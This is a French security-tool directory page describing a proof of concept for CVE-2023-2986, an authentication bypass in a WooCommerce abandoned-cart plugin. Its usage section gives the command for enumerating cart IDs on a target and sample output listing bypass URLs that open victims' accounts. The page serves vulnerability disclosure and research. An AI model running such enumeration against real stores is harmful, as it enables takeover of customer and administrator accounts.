Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-2986 — Proof of Concept for vulnerability CVE-2023-2986 in 'Abandoned Cart Lite for WooCommerce' Plugin in WordPress | Kitploit
Outils/GitHubGitHub/ayantaker/cve-2023-2986
Authentication & AuthorizationVulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration Testing
GitHubayantaker/cve-2023-2986

CVE-2023-2986

Proof of Concept for vulnerability CVE-2023-2986 in 'Abandoned Cart Lite for WooCommerce' Plugin in WordPress

Voir le dépôt
63il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Preuve de concept originale pour CVE-2023-2986

Preuve de concept pour la vulnérabilité CVE-2023-2986 dans le plugin 'Abandoned Cart Lite for WooCommerce' pour WordPress

Détails connexes

  • Lien NVD : https://nvd.nist.gov/vuln/detail/CVE-2023-2986
  • Source du plugin : https://github.com/TycheSoftwares/woocommerce-abandoned-cart/
  • Versions vulnérables : version <= 5.14.2 version <= 5.15.1
  • Version corrigée : 5.15.0 5.15.2

Mise à jour

On pensait que la version 5.15.0 corrigeait le problème, mais j'ai découvert qu'elle n'était pas entièrement corrigée et la même chose a été mise à jour. Donc la version corrigée réelle est 5.15.2

Analyse de la vulnérabilité

  • Blogs Keysight : https://www.keysight.com/blogs/tech/nwvs/2023/08/23/cve-2023-2986
  • Medium : https://medium.com/keysight-ati/cve-2023-2986-wordpress-plugin-vulnerability-and-the-importance-of-poc-7c9c5122438b

Utilisation

root@kitploit:~
sudo apt-get install php-curl
php poc.php http://target_host target_port max_cart_id_to_enumerate
root@kitploit:~
[*] Enumerating cart ID : 1
[+] Authentication Bypass URL for user 'victim' : https://10.39.44.149:443/?wcal_action=checkout_link&validate=pwDHtAFjg2StEr4S2bP9YXkwVdKLqnsLjpkFGythB5ztEF8twVbXFdEP6u7kYwrc
[*] Enumerating cart ID : 2
[*] Enumerating cart ID : 3
[+] Authentication Bypass URL for user 'victim2' : https://10.39.44.149:443/?wcal_action=checkout_link&validate=aQH9pwVjg2TWqKcFmNoipUeBKbYNb5UaEYMYP8DlCz3DqykRdzP3lQgEqID6QsoD
[*] Enumerating cart ID : 4
[+] Authentication Bypass URL for user 'user' : https://10.39.44.149:443/?wcal_action=checkout_link&validate=XQOexwdjg2TzUjbZJgcYAeUE1p7YdPytSYL3Vkkjb+gISKD02Cpk+3Dx6SUnbe5d
[*] Enumerating cart ID : 5

Entrer l'URL dans le navigateur vous donnera accès au compte de l'utilisateur respectif. Si l'utilisateur administrateur WordPress lui-même a une entrée, cela donnera accès à la console d'administration, conduisant à une compromission totale du serveur WordPress.

Avertissement

Cette preuve de concept (POC) a été créée purement à des fins de recherche académique et de développement de techniques défensives efficaces, et n'est pas destinée à être utilisée pour attaquer des systèmes sauf autorisation explicite. L'auteur n'est pas responsable de toute utilisation abusive de la POC. Utilisez-la de manière responsable.

Télécharger l’outil